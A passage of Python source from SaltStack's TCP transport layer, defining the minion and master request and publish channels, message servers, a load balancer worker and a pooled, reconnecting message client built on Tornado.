            self._socket.listen(self.backlog)
            while True:
                try:
                    # Wait for a connection to occur since the socket is
                    # blocking.
                    connection, address = self._socket.accept()
                    # Wait for a free slot to be available to put
                    # the connection into.
                    # Sockets are picklable on Windows in Python 3.
                    self.socket_queue.put((connection, address), True, None)
                except socket.error as e:
                    # ECONNABORTED indicates that there was a connection
                    # but it was closed while still in the accept queue.
                    # (observed on FreeBSD).
                    if tornado.util.errno_from_exception(e) == errno.ECONNABORTED:
                        continue
                    raise
# TODO: move serial down into message library
class AsyncTCPReqChannel(salt.transport.client.ReqChannel):
    '''
    Encapsulate sending routines to tcp.
    Note: this class returns a singleton
    '''
    # This class is only a singleton per minion/master pair
    # mapping of io_loop -> {key -> channel}
    instance_map = weakref.WeakKeyDictionary()
    def __new__(cls, opts, **kwargs):
        '''
        Only create one instance of channel per __key()
        '''
        # do we have any mapping for this io_loop
        io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
        if io_loop not in cls.instance_map:
            cls.instance_map[io_loop] = weakref.WeakValueDictionary()
        loop_instance_map = cls.instance_map[io_loop]
        key = cls.__key(opts, **kwargs)
        obj = loop_instance_map.get(key)
        if obj is None:
            log.debug('Initializing new AsyncTCPReqChannel for %s', key)
            # we need to make a local variable for this, as we are going to store
            # it in a WeakValueDictionary-- which will remove the item if no one
            # references it-- this forces a reference while we return to the caller
            obj = object.__new__(cls)
            obj.__singleton_init__(opts, **kwargs)
            obj._instance_key = key
            loop_instance_map[key] = obj
            # Reference counting lets multiple users share the singleton and
            # only the last close() actually tear it down.
            obj._refcount = 1
            obj._refcount_lock = threading.RLock()
        else:
            with obj._refcount_lock:
                obj._refcount += 1
            log.debug('Re-using AsyncTCPReqChannel for %s', key)
        return obj
    @classmethod
    def __key(cls, opts, **kwargs):
        # Singleton key: one channel per (pki_dir, minion id, master, crypt).
        if 'master_uri' in kwargs:
            opts['master_uri'] = kwargs['master_uri']
        return (opts['pki_dir'],     # where the keys are stored
                opts['id'],          # minion ID
                opts['master_uri'],
                kwargs.get('crypt', 'aes'),  # TODO: use the same channel for crypt
                )
    # has to remain empty for singletons, since __init__ will *always* be called
    def __init__(self, opts, **kwargs):
        pass
    # an init for the singleton instance to call
    def __singleton_init__(self, opts, **kwargs):
        self.opts = dict(opts)
        self.serial = salt.payload.Serial(self.opts)
        # crypt defaults to 'aes'
        self.crypt = kwargs.get('crypt', 'aes')
        self.io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
        if self.crypt != 'clear':
            self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
        resolver = kwargs.get('resolver')
        # Parse 'tcp://host:port' to derive the master address.
        parse = urlparse.urlparse(self.opts['master_uri'])
        master_host, master_port = parse.netloc.rsplit(':', 1)
        self.master_addr = (master_host, int(master_port))
        self._closing = False
        self.message_client = SaltMessageClientPool(self.opts,
                                                    args=(self.opts, master_host, int(master_port),),
                                                    kwargs={'io_loop': self.io_loop, 'resolver': resolver,
                                                            'source_ip': self.opts.get('source_ip'),
                                                            'source_port': self.opts.get('source_ret_port')})
    def close(self):
        # Decrement the refcount; only the last holder really closes.
        if self._closing:
            return
        if self._refcount > 1:
            # Decrease refcount
            with self._refcount_lock:
                self._refcount -= 1
            log.debug(
                'This is not the last %s instance. Not closing yet.',
                self.__class__.__name__
            )
            return
        log.debug('Closing %s instance', self.__class__.__name__)
        self._closing = True
        self.message_client.close()
        # Remove the entry from the instance map so that a closed entry may not
        # be reused.
        # This forces this operation even if the reference count of the entry
        # has not yet gone to zero.
        if self.io_loop in self.__class__.instance_map:
            loop_instance_map = self.__class__.instance_map[self.io_loop]
            if self._instance_key in loop_instance_map:
                del loop_instance_map[self._instance_key]
            if not loop_instance_map:
                del self.__class__.instance_map[self.io_loop]
    # pylint: disable=W1701
    def __del__(self):
        with self._refcount_lock:
            # Make sure we actually close no matter if something
            # went wrong with our ref counting
            self._refcount = 1
        try:
            self.close()
        except socket.error as exc:
            if exc.errno != errno.EBADF:
                # If its not a bad file descriptor error, raise
                raise
    # pylint: enable=W1701
    def _package_load(self, load):
        # Wrap the payload with its encryption marker for the wire.
        return {
            'enc': self.crypt,
            'load': load,
        }
    @tornado.gen.coroutine
    def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
        # Send an encrypted request and decrypt a single dict entry of the
        # reply: the master returns an RSA-encrypted session key under
        # 'key', which decrypts the value stored under `dictkey`.
        if not self.auth.authenticated:
            yield self.auth.authenticate()
        ret = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout)
        key = self.auth.get_keys()
        if HAS_M2:
            aes = key.private_decrypt(ret['key'], RSA.pkcs1_oaep_padding)
        else:
            cipher = PKCS1_OAEP.new(key)
            aes = cipher.decrypt(ret['key'])
        pcrypt = salt.crypt.Crypticle(self.opts, aes)
        data = pcrypt.loads(ret[dictkey])
        if six.PY3:
            data = salt.transport.frame.decode_embedded_strs(data)
        raise tornado.gen.Return(data)
    @tornado.gen.coroutine
    def _crypted_transfer(self, load, tries=3, timeout=60):
        '''
        In case of authentication errors, try to renegotiate authentication
        and retry the method.
        Indeed, we can fail too early in case of a master restart during a
        minion state execution call
        '''
        @tornado.gen.coroutine
        def _do_transfer():
            data = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)),
                                                  timeout=timeout,
                                                  )
            # we may not have always data
            # as for example for saltcall ret submission, this is a blind
            # communication, we do not subscribe to return events, we just
            # upload the results to the master
            if data:
                data = self.auth.crypticle.loads(data)
                if six.PY3:
                    data = salt.transport.frame.decode_embedded_strs(data)
            raise tornado.gen.Return(data)
        if not self.auth.authenticated:
            yield self.auth.authenticate()
        try:
            ret = yield _do_transfer()
            raise tornado.gen.Return(ret)
        except salt.crypt.AuthenticationError:
            # Stale session (e.g. master restarted): re-auth once and retry.
            yield self.auth.authenticate()
            ret = yield _do_transfer()
            raise tornado.gen.Return(ret)
    @tornado.gen.coroutine
    def _uncrypted_transfer(self, load, tries=3, timeout=60):
        # Plaintext variant used when crypt == 'clear'.
        ret = yield self.message_client.send(self._package_load(load), timeout=timeout)
        raise tornado.gen.Return(ret)
    @tornado.gen.coroutine
    def send(self, load, tries=3, timeout=60, raw=False):
        '''
        Send a request, return a future which will complete when we send the message
        '''
        try:
            if self.crypt == 'clear':
                ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
            else:
                ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout)
        except tornado.iostream.StreamClosedError:
            # Convert to 'SaltClientError' so that clients can handle this
            # exception more appropriately.
            raise SaltClientError('Connection to master lost')
        raise tornado.gen.Return(ret)
class AsyncTCPPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel):
    # Minion-side subscriber channel for master publications over TCP.
    def __init__(self,
                 opts,
                 **kwargs):
        self.opts = opts
        self.serial = salt.payload.Serial(self.opts)
        self.crypt = kwargs.get('crypt', 'aes')
        self.io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
        self.connected = False
        self._closing = False
        self._reconnected = False
        # Local event bus used to announce master (dis)connection.
        self.event = salt.utils.event.get_event(
            'minion',
            opts=self.opts,
            listen=False
        )
    def close(self):
        if self._closing:
            return
        self._closing = True
        # message_client only exists after a successful connect().
        if hasattr(self, 'message_client'):
            self.message_client.close()
    # pylint: disable=W1701
    def __del__(self):
        self.close()
    # pylint: enable=W1701
    def _package_load(self, load):
        # Wrap the payload with its encryption marker for the wire.
        return {
            'enc': self.crypt,
            'load': load,
        }
    @tornado.gen.coroutine
    def send_id(self, tok, force_auth):
        '''
        Send the minion id to the master so that the master may better
        track the connection state of the minion.
        In case of authentication errors, try to renegotiate authentication
        and retry the method.
        '''
        load = {'id': self.opts['id'], 'tok': tok}
        @tornado.gen.coroutine
        def _do_transfer():
            msg = self._package_load(self.auth.crypticle.dumps(load))
            package = salt.transport.frame.frame_msg(msg, header=None)
            yield self.message_client.write_to_stream(package)
            raise tornado.gen.Return(True)
        if force_auth or not self.auth.authenticated:
            count = 0
            # Retry authentication up to tcp_authentication_retries times;
            # a negative setting means retry forever.
            while count <= self.opts['tcp_authentication_retries'] or self.opts['tcp_authentication_retries'] < 0:
                try:
                    yield self.auth.authenticate()
                    break
                except SaltClientError as exc:
                    log.debug(exc)
                    count += 1
        try:
            ret = yield _do_transfer()
            raise tornado.gen.Return(ret)
        except salt.crypt.AuthenticationError:
            yield self.auth.authenticate()
            ret = yield _do_transfer()
            raise tornado.gen.Return(ret)
    @tornado.gen.coroutine
    def connect_callback(self, result):
        # Runs every time the underlying stream (re)connects.
        if self._closing:
            return
        # Force re-auth on reconnect since the master
        # may have been restarted
        yield self.send_id(self.tok, self._reconnected)
        self.connected = True
        self.event.fire_event(
            {'master': self.opts['master']},
            '__master_connected'
        )
        if self._reconnected:
            # On reconnects, fire a master event to notify that the minion is
            # available.
            if self.opts.get('__role') == 'syndic':
                data = 'Syndic {0} started at {1}'.format(
                    self.opts['id'],
                    time.asctime()
                )
                tag = salt.utils.event.tagify(
                    [self.opts['id'], 'start'],
                    'syndic'
                )
            else:
                data = 'Minion {0} started at {1}'.format(
                    self.opts['id'],
                    time.asctime()
                )
                tag = salt.utils.event.tagify(
                    [self.opts['id'], 'start'],
                    'minion'
                )
            load = {'id': self.opts['id'],
                    'cmd': '_minion_event',
                    'pretag': None,
                    'tok': self.tok,
                    'data': data,
                    'tag': tag}
            req_channel = salt.utils.asynchronous.SyncWrapper(
                AsyncTCPReqChannel, (self.opts,)
            )
            try:
                req_channel.send(load, timeout=60)
            except salt.exceptions.SaltReqTimeoutError:
                log.info('fire_master failed: master could not be contacted. Request timed out.')
            except Exception:
                log.info('fire_master failed: %s', traceback.format_exc())
            finally:
                # SyncWrapper will call either close() or destroy(), whichever is available
                del req_channel
        else:
            # First successful connect; subsequent callbacks are reconnects.
            self._reconnected = True
    def disconnect_callback(self):
        if self._closing:
            return
        self.connected = False
        self.event.fire_event(
            {'master': self.opts['master']},
            '__master_disconnected'
        )
    @tornado.gen.coroutine
    def connect(self):
        # Authenticate, then open the pub stream to the master's publish port.
        try:
            self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
            self.tok = self.auth.gen_token(b'salt')
            if not self.auth.authenticated:
                yield self.auth.authenticate()
            if self.auth.authenticated:
                self.message_client = SaltMessageClientPool(
                    self.opts,
                    args=(self.opts, self.opts['master_ip'], int(self.auth.creds['publish_port']),),
                    kwargs={'io_loop': self.io_loop,
                            'connect_callback': self.connect_callback,
                            'disconnect_callback': self.disconnect_callback,
                            'source_ip': self.opts.get('source_ip'),
                            'source_port': self.opts.get('source_publish_port')})
                yield self.message_client.connect()  # wait for the client to be connected
                self.connected = True
        # TODO: better exception handling...
        except KeyboardInterrupt:
            raise
        except Exception as exc:
            if '-|RETRY|-' not in six.text_type(exc):
                raise SaltClientError('Unable to sign_in to master: {0}'.format(exc))  # TODO: better error message
    def on_recv(self, callback):
        '''
        Register an on_recv callback
        '''
        if callback is None:
            return self.message_client.on_recv(callback)
        @tornado.gen.coroutine
        def wrap_callback(body):
            if not isinstance(body, dict):
                # TODO: For some reason we need to decode here for things
                # to work. Fix this.
                body = salt.utils.msgpack.loads(body)
                if six.PY3:
                    body = salt.transport.frame.decode_embedded_strs(body)
            ret = yield self._decode_payload(body)
            callback(ret)
        return self.message_client.on_recv(wrap_callback)
class TCPReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel):
    # Master-side request server: accepts minion req connections over TCP.
    # TODO: opts!
    backlog = 5
    def __init__(self, opts):
        salt.transport.server.ReqServerChannel.__init__(self, opts)
        self._socket = None
    @property
    def socket(self):
        # Listening socket (None until pre_fork/post_fork creates it).
        return self._socket
    def close(self):
        if self._socket is not None:
            try:
                self._socket.shutdown(socket.SHUT_RDWR)
            except socket.error as exc:
                if exc.errno == errno.ENOTCONN:
                    # We may try to shutdown a socket which is already disconnected.
                    # Ignore this condition and continue.
                    pass
                else:
                    six.reraise(*sys.exc_info())
            self._socket.close()
            self._socket = None
        if hasattr(self.req_server, 'shutdown'):
            try:
                self.req_server.shutdown()
            except Exception as exc:
                log.exception('TCPReqServerChannel close generated an exception: %s', str(exc))
        elif hasattr(self.req_server, 'stop'):
            try:
                self.req_server.stop()
            except socket.error as exc:
                # errno 9 == EBADF: socket already gone, just log it.
                if exc.errno != 9:
                    raise
                log.exception('TCPReqServerChannel close generated an exception: %s', str(exc))
    # pylint: disable=W1701
    def __del__(self):
        self.close()
    # pylint: enable=W1701
    def pre_fork(self, process_manager):
        '''
        Pre-fork we need to create the zmq router device
        '''
        salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
        if USE_LOAD_BALANCER:
            self.socket_queue = multiprocessing.Queue()
            process_manager.add_process(
                LoadBalancerServer, args=(self.opts, self.socket_queue)
            )
        elif not salt.utils.platform.is_windows():
            # Bind before forking so all workers share the listening socket.
            self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            _set_tcp_keepalive(self._socket, self.opts)
            self._socket.setblocking(0)
            self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
    def post_fork(self, payload_handler, io_loop):
        '''
        After forking we need to create all of the local sockets to listen to the
        router
        payload_handler: function to call with your payloads
        '''
        self.payload_handler = payload_handler
        self.io_loop = io_loop
        self.serial = salt.payload.Serial(self.opts)
        with salt.utils.asynchronous.current_ioloop(self.io_loop):
            if USE_LOAD_BALANCER:
                self.req_server = LoadBalancerWorker(self.socket_queue,
                                                     self.handle_message,
                                                     ssl_options=self.opts.get('ssl'))
            else:
                if salt.utils.platform.is_windows():
                    # On Windows the socket could not be created pre-fork.
                    self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                    _set_tcp_keepalive(self._socket, self.opts)
                    self._socket.setblocking(0)
                    self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
                self.req_server = SaltMessageServer(self.handle_message,
                                                    ssl_options=self.opts.get('ssl'),
                                                    io_loop=self.io_loop)
                self.req_server.add_socket(self._socket)
                self._socket.listen(self.backlog)
        salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop)
    @tornado.gen.coroutine
    def handle_message(self, stream, header, payload):
        '''
        Handle incoming messages from underylying tcp streams
        '''
        try:
            try:
                payload = self._decode_payload(payload)
            except Exception:
                stream.write(salt.transport.frame.frame_msg('bad load', header=header))
                raise tornado.gen.Return()
            # TODO helper functions to normalize payload?
            if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict):
                yield stream.write(salt.transport.frame.frame_msg(
                    'payload and load must be a dict', header=header))
                raise tornado.gen.Return()
            try:
                id_ = payload['load'].get('id', '')
                if str('\0') in id_:
                    log.error('Payload contains an id with a null byte: %s', payload)
                    # NOTE(review): tornado IOStream appears to have no
                    # send(); presumably this should be stream.write(...)
                    # like the other replies -- confirm.
                    stream.send(self.serial.dumps('bad load: id contains a null byte'))
                    raise tornado.gen.Return()
            except TypeError:
                log.error('Payload contains non-string id: %s', payload)
                # NOTE(review): same stream.send concern as above.
                stream.send(self.serial.dumps('bad load: id {0} is not a string'.format(id_)))
                raise tornado.gen.Return()
            # intercept the "_auth" commands, since the main daemon shouldn't know
            # anything about our key auth
            if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth':
                yield stream.write(salt.transport.frame.frame_msg(
                    self._auth(payload['load']), header=header))
                raise tornado.gen.Return()
            # TODO: test
            try:
                ret, req_opts = yield self.payload_handler(payload)
            except Exception as e:
                # always attempt to return an error to the minion
                stream.write('Some exception handling minion payload')
                log.error('Some exception handling a payload from minion', exc_info=True)
                stream.close()
                raise tornado.gen.Return()
            req_fun = req_opts.get('fun', 'send')
            if req_fun == 'send_clear':
                stream.write(salt.transport.frame.frame_msg(ret, header=header))
            elif req_fun == 'send':
                stream.write(salt.transport.frame.frame_msg(self.crypticle.dumps(ret), header=header))
            elif req_fun == 'send_private':
                stream.write(salt.transport.frame.frame_msg(self._encrypt_private(ret,
                                                                                  req_opts['key'],
                                                                                  req_opts['tgt'],
                                                                                  ), header=header))
            else:
                log.error('Unknown req_fun %s', req_fun)
                # always attempt to return an error to the minion
                stream.write('Server-side exception handling payload')
                stream.close()
        except tornado.gen.Return:
            raise
        except tornado.iostream.StreamClosedError:
            # Stream was closed. This could happen if the remote side
            # closed the connection on its end (eg in a timeout or shutdown
            # situation).
            log.error('Connection was unexpectedly closed', exc_info=True)
        except Exception as exc:  # pylint: disable=broad-except
            # Absorb any other exceptions
            log.error('Unexpected exception occurred: %s', exc, exc_info=True)
        raise tornado.gen.Return()
class SaltMessageServer(tornado.tcpserver.TCPServer, object):
    '''
    Raw TCP server which will receive all of the TCP streams and re-assemble
    messages that are sent through to us
    '''
    def __init__(self, message_handler, *args, **kwargs):
        io_loop = kwargs.pop('io_loop', None) or tornado.ioloop.IOLoop.current()
        super(SaltMessageServer, self).__init__(*args, **kwargs)
        self.io_loop = io_loop
        # Connected (stream, address) pairs, for shutdown bookkeeping.
        self.clients = []
        self.message_handler = message_handler
        self._shutting_down = False
    @tornado.gen.coroutine
    def handle_stream(self, stream, address):
        '''
        Handle incoming streams and add messages to the incoming queue
        '''
        log.trace('Req client %s connected', address)
        self.clients.append((stream, address))
        # Incremental msgpack unpacker: reassembles messages that span
        # multiple 4096-byte reads.
        unpacker = salt.utils.msgpack.Unpacker()
        try:
            while True:
                wire_bytes = yield stream.read_bytes(4096, partial=True)
                unpacker.feed(wire_bytes)
                for framed_msg in unpacker:
                    if six.PY3:
                        framed_msg = salt.transport.frame.decode_embedded_strs(
                            framed_msg
                        )
                    header = framed_msg['head']
                    self.io_loop.spawn_callback(self.message_handler, stream, header, framed_msg['body'])
        except tornado.iostream.StreamClosedError:
            log.trace('req client disconnected %s', address)
            self.remove_client((stream, address))
        except Exception as e:
            log.trace('other master-side exception: %s', e)
            self.remove_client((stream, address))
            stream.close()
    def remove_client(self, client):
        # Forget a (stream, address) pair; tolerate double removal.
        try:
            self.clients.remove(client)
        except ValueError:
            log.trace("Message server client was not in list to remove")
    def shutdown(self):
        '''
        Shutdown the whole server
        '''
        if self._shutting_down:
            return
        self._shutting_down = True
        for item in self.clients:
            client, address = item
            client.close()
            self.remove_client(item)
        try:
            self.stop()
        except socket.error as exc:
            # errno 9 == EBADF: listening socket already closed.
            if exc.errno != 9:
                raise
if USE_LOAD_BALANCER:
    class LoadBalancerWorker(SaltMessageServer):
        '''
        This will receive TCP connections from 'LoadBalancerServer' via
        a multiprocessing queue.
        Since the queue is shared amongst workers, only one worker will handle
        a given connection.
        '''
        def __init__(self, socket_queue, message_handler, *args, **kwargs):
            super(LoadBalancerWorker, self).__init__(
                message_handler, *args, **kwargs)
            self.socket_queue = socket_queue
            self._stop = threading.Event()
            # Background thread that pulls accepted sockets off the queue.
            self.thread = threading.Thread(target=self.socket_queue_thread)
            self.thread.start()
        def stop(self):
            self._stop.set()
            self.thread.join()
        def socket_queue_thread(self):
            try:
                while True:
                    try:
                        # 1s timeout so the stop flag is polled regularly.
                        client_socket, address = self.socket_queue.get(True, 1)
                    except queue.Empty:
                        if self._stop.is_set():
                            break
                        continue
                    # 'self.io_loop' initialized in super class
                    # 'tornado.tcpserver.TCPServer'.
                    # 'self._handle_connection' defined in same super class.
                    self.io_loop.spawn_callback(
                        self._handle_connection, client_socket, address)
            except (KeyboardInterrupt, SystemExit):
                pass
class TCPClientKeepAlive(tornado.tcpclient.TCPClient):
    '''
    Override _create_stream() in TCPClient to enable keep alive support.
    '''
    def __init__(self, opts, resolver=None):
        # opts carries the tcp_keepalive* settings applied per connection.
        self.opts = opts
        super(TCPClientKeepAlive, self).__init__(resolver=resolver)
    def _create_stream(self, max_buffer_size, af, addr, **kwargs): # pylint: disable=unused-argument
        '''
        Override _create_stream() in TCPClient.
        Tornado 4.5 added the kwargs 'source_ip' and 'source_port'.
        Due to this, use **kwargs to swallow these and any future
        kwargs to maintain compatibility.
        '''
        # Always connect in plaintext; we'll convert to ssl if necessary
        # after one connection has completed.
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        _set_tcp_keepalive(sock, self.opts)
        stream = tornado.iostream.IOStream(
            sock,
            max_buffer_size=max_buffer_size)
        # Tornado 5+ expects (stream, connect_future); older versions expect
        # just the connect future.
        if tornado.version_info < (5,):
            return stream.connect(addr)
        return stream, stream.connect(addr)
class SaltMessageClientPool(salt.transport.MessageClientPool):
    '''
    Wrapper class of SaltMessageClient to avoid blocking waiting while writing data to socket.

    Maintains a pool of SaltMessageClient instances; outgoing traffic is
    routed to the client with the shortest pending send queue.
    '''
    def __init__(self, opts, args=None, kwargs=None):
        super(SaltMessageClientPool, self).__init__(SaltMessageClient, opts, args=args, kwargs=kwargs)
    # pylint: disable=W1701
    def __del__(self):
        self.close()
    # pylint: enable=W1701
    def close(self):
        '''Close every pooled client and empty the pool.'''
        for message_client in self.message_clients:
            message_client.close()
        self.message_clients = []
    @tornado.gen.coroutine
    def connect(self):
        '''Kick off all client connections in parallel; resolves once every
        pooled client is connected.'''
        futures = []
        for message_client in self.message_clients:
            futures.append(message_client.connect())
        for future in futures:
            yield future
        raise tornado.gen.Return(None)
    def on_recv(self, *args, **kwargs):
        '''Register a receive callback on every pooled client.'''
        for message_client in self.message_clients:
            message_client.on_recv(*args, **kwargs)
    def _least_busy(self):
        '''Return the pooled client with the fewest queued sends.

        A single O(n) min() pass replaces the previous full sort of the
        pool on every call; ties resolve to the first such client, exactly
        as the stable sort did.
        '''
        return min(self.message_clients, key=lambda client: len(client.send_queue))
    def send(self, *args, **kwargs):
        '''Send a message via the least-busy pooled client.'''
        return self._least_busy().send(*args, **kwargs)
    def write_to_stream(self, *args, **kwargs):
        '''Write raw framed bytes on the least-busy client's stream.'''
        return self._least_busy()._stream.write(*args, **kwargs)
# TODO consolidate with IPCClient
# TODO: limit in-flight messages.
# TODO: singleton? Something to not re-create the tcp connection so much
class SaltMessageClient(object):
    '''
    Low-level message sending client.

    Maintains one TCP stream to ``host:port``, frames outgoing messages
    with a monotonically increasing message id, and matches incoming
    framed responses back to the Future returned from :meth:`send`.
    Reconnects forever in the background when the stream drops.
    '''
    def __init__(self, opts, host, port, io_loop=None, resolver=None,
                 connect_callback=None, disconnect_callback=None,
                 source_ip=None, source_port=None):
        self.opts = opts
        self.host = host
        self.port = port
        # Optional local bind address/port; only honored on Tornado >= 4.5
        # (see _connect()).
        self.source_ip = source_ip
        self.source_port = source_port
        # Called with the connect result on (re)connect, and with no args
        # when the stream is lost, respectively.
        self.connect_callback = connect_callback
        self.disconnect_callback = disconnect_callback
        self.io_loop = io_loop or tornado.ioloop.IOLoop.current()
        # Create the keep-alive TCP client bound to our io_loop.
        with salt.utils.asynchronous.current_ioloop(self.io_loop):
            self._tcp_client = TCPClientKeepAlive(opts, resolver=resolver)
        # Next message id; wraps back to 1 before reaching _max_messages.
        self._mid = 1
        self._max_messages = int((1 << 31) - 2)  # number of IDs before we wrap
        # TODO: max queue size
        self.send_queue = []  # queue of messages to be sent
        self.send_future_map = {}  # mapping of request_id -> Future
        self.send_timeout_map = {}  # request_id -> timeout_callback
        self._read_until_future = None
        self._on_recv = None
        self._closing = False
        # Start the initial connection attempt and the background reader.
        self._connecting_future = self.connect()
        self._stream_return_future = tornado.concurrent.Future()
        self.io_loop.spawn_callback(self._stream_return)

    def _stop_io_loop(self):
        # Helper used from close() to unwind a temporarily restarted loop.
        if self.io_loop is not None:
            self.io_loop.stop()

    # TODO: timeout inflight sessions
    def close(self):
        '''
        Tear down the stream and TCP client; safe to call more than once.
        '''
        if self._closing:
            return
        self._closing = True
        if hasattr(self, '_stream') and not self._stream.closed():
            # If _stream_return() hasn't completed, it means the IO
            # Loop is stopped (such as when using
            # 'salt.utils.asynchronous.SyncWrapper'). Ensure that
            # _stream_return() completes by restarting the IO Loop.
            # This will prevent potential errors on shutdown.
            try:
                orig_loop = tornado.ioloop.IOLoop.current()
                self.io_loop.make_current()
                self._stream.close()
                if self._read_until_future is not None:
                    # This will prevent this message from showing up:
                    # '[ERROR ] Future exception was never retrieved:
                    # StreamClosedError'
                    # This happens because the logic is always waiting to read
                    # the next message and the associated read future is marked
                    # 'StreamClosedError' when the stream is closed.
                    if self._read_until_future.done():
                        self._read_until_future.exception()
                    if (self.io_loop != tornado.ioloop.IOLoop.current(instance=False)
                            or not self._stream_return_future.done()):
                        # Spin our io_loop until the reader coroutine has
                        # finished, then stop it again.
                        self.io_loop.add_future(
                            self._stream_return_future,
                            lambda future: self._stop_io_loop()
                        )
                        self.io_loop.start()
            except Exception as e:
                log.info('Exception caught in SaltMessageClient.close: %s', str(e))
            finally:
                orig_loop.make_current()
        self._tcp_client.close()
        self.io_loop = None
        self._read_until_future = None
        # Clear callback references to allow the object that they belong to
        # to be deleted.
        self.connect_callback = None
        self.disconnect_callback = None

    # pylint: disable=W1701
    def __del__(self):
        self.close()
    # pylint: enable=W1701

    def connect(self):
        '''
        Ask for this client to reconnect to the origin
        '''
        if hasattr(self, '_connecting_future') and not self._connecting_future.done():
            # A connection attempt is already in flight; share its future.
            future = self._connecting_future
        else:
            future = tornado.concurrent.Future()
            self._connecting_future = future
            self.io_loop.add_callback(self._connect)

            # Add the callback only when a new future is created
            if self.connect_callback is not None:
                def handle_future(future):
                    response = future.result()
                    self.io_loop.add_callback(self.connect_callback, response)
                future.add_done_callback(handle_future)

        return future

    # TODO: tcp backoff opts
    @tornado.gen.coroutine
    def _connect(self):
        '''
        Try to connect for the rest of time!
        '''
        while True:
            if self._closing:
                break
            try:
                kwargs = {}
                if self.source_ip or self.source_port:
                    if tornado.version_info >= (4, 5):
                        ### source_ip and source_port are supported only in Tornado >= 4.5
                        # See http://www.tornadoweb.org/en/stable/releases/v4.5.0.html
                        # Otherwise will just ignore these args
                        kwargs = {'source_ip': self.source_ip,
                                  'source_port': self.source_port}
                    else:
                        log.warning('If you need a certain source IP/port, consider upgrading Tornado >= 4.5')
                with salt.utils.asynchronous.current_ioloop(self.io_loop):
                    self._stream = yield self._tcp_client.connect(self.host,
                                                                  self.port,
                                                                  ssl_options=self.opts.get('ssl'),
                                                                  **kwargs)
                self._connecting_future.set_result(True)
                break
            except Exception as exc:
                # NOTE(review): log.warn is deprecated; log.warning is preferred.
                log.warn('TCP Message Client encountered an exception %r', exc)
                yield tornado.gen.sleep(1)  # TODO: backoff
                #self._connecting_future.set_exception(e)

    @tornado.gen.coroutine
    def _stream_return(self):
        '''
        Background reader: unpack framed messages off the stream and route
        them to the waiting send() Future (by mid) or the on_recv callback.
        Reconnects and keeps reading when the stream drops.
        '''
        try:
            # Wait until the initial connection has actually succeeded.
            while not self._closing and (
                    not self._connecting_future.done() or
                    self._connecting_future.result() is not True):
                yield self._connecting_future
            unpacker = salt.utils.msgpack.Unpacker()
            while not self._closing:
                try:
                    self._read_until_future = self._stream.read_bytes(4096, partial=True)
                    wire_bytes = yield self._read_until_future
                    unpacker.feed(wire_bytes)
                    for framed_msg in unpacker:
                        if six.PY3:
                            framed_msg = salt.transport.frame.decode_embedded_strs(
                                framed_msg
                            )
                        header = framed_msg['head']
                        body = framed_msg['body']
                        message_id = header.get('mid')

                        if message_id in self.send_future_map:
                            # A response to one of our requests: resolve it.
                            self.send_future_map.pop(message_id).set_result(body)
                            self.remove_message_timeout(message_id)
                        else:
                            # Unsolicited message (not a reply we initiated).
                            if self._on_recv is not None:
                                self.io_loop.spawn_callback(self._on_recv, header, body)
                            else:
                                log.error('Got response for message_id %s that we are not tracking', message_id)
                except tornado.iostream.StreamClosedError as e:
                    log.debug('tcp stream to %s:%s closed, unable to recv', self.host, self.port)
                    # Fail every in-flight request so callers don't hang.
                    for future in six.itervalues(self.send_future_map):
                        future.set_exception(e)
                    self.send_future_map = {}
                    if self._closing:
                        return
                    if self.disconnect_callback:
                        self.disconnect_callback()
                    # if the last connect finished, then we need to make a new one
                    if self._connecting_future.done():
                        self._connecting_future = self.connect()
                    yield self._connecting_future
                except TypeError:
                    # This is an invalid transport
                    if 'detect_mode' in self.opts:
                        log.info('There was an error trying to use TCP transport; '
                                 'attempting to fallback to another transport')
                    else:
                        raise SaltClientError
                except Exception as e:
                    log.error('Exception parsing response', exc_info=True)
                    for future in six.itervalues(self.send_future_map):
                        future.set_exception(e)
                    self.send_future_map = {}
                    if self._closing:
                        return
                    if self.disconnect_callback:
                        self.disconnect_callback()
                    # if the last connect finished, then we need to make a new one
                    if self._connecting_future.done():
                        self._connecting_future = self.connect()
                    yield self._connecting_future
        finally:
            # Signals close() that the reader has fully unwound.
            self._stream_return_future.set_result(True)

    @tornado.gen.coroutine
    def _stream_send(self):
        '''
        Drain the send_queue onto the stream; spawned lazily by send()
        whenever the queue transitions from empty to non-empty.
        '''
        while not self._connecting_future.done() or self._connecting_future.result() is not True:
            yield self._connecting_future
        while len(self.send_queue) > 0:
            message_id, item = self.send_queue[0]
            try:
                yield self._stream.write(item)
                del self.send_queue[0]
            # if the connection is dead, lets fail this send, and make sure we
            # attempt to reconnect
            except tornado.iostream.StreamClosedError as e:
                if message_id in self.send_future_map:
                    self.send_future_map.pop(message_id).set_exception(e)
                self.remove_message_timeout(message_id)
                del self.send_queue[0]
                if self._closing:
                    return
                if self.disconnect_callback:
                    self.disconnect_callback()
                # if the last connect finished, then we need to make a new one
                if self._connecting_future.done():
                    self._connecting_future = self.connect()
                yield self._connecting_future

    def _message_id(self):
        '''
        Return the next free message id, wrapping around at _max_messages.
        Raises if every id is in use (practically unreachable).
        '''
        wrap = False
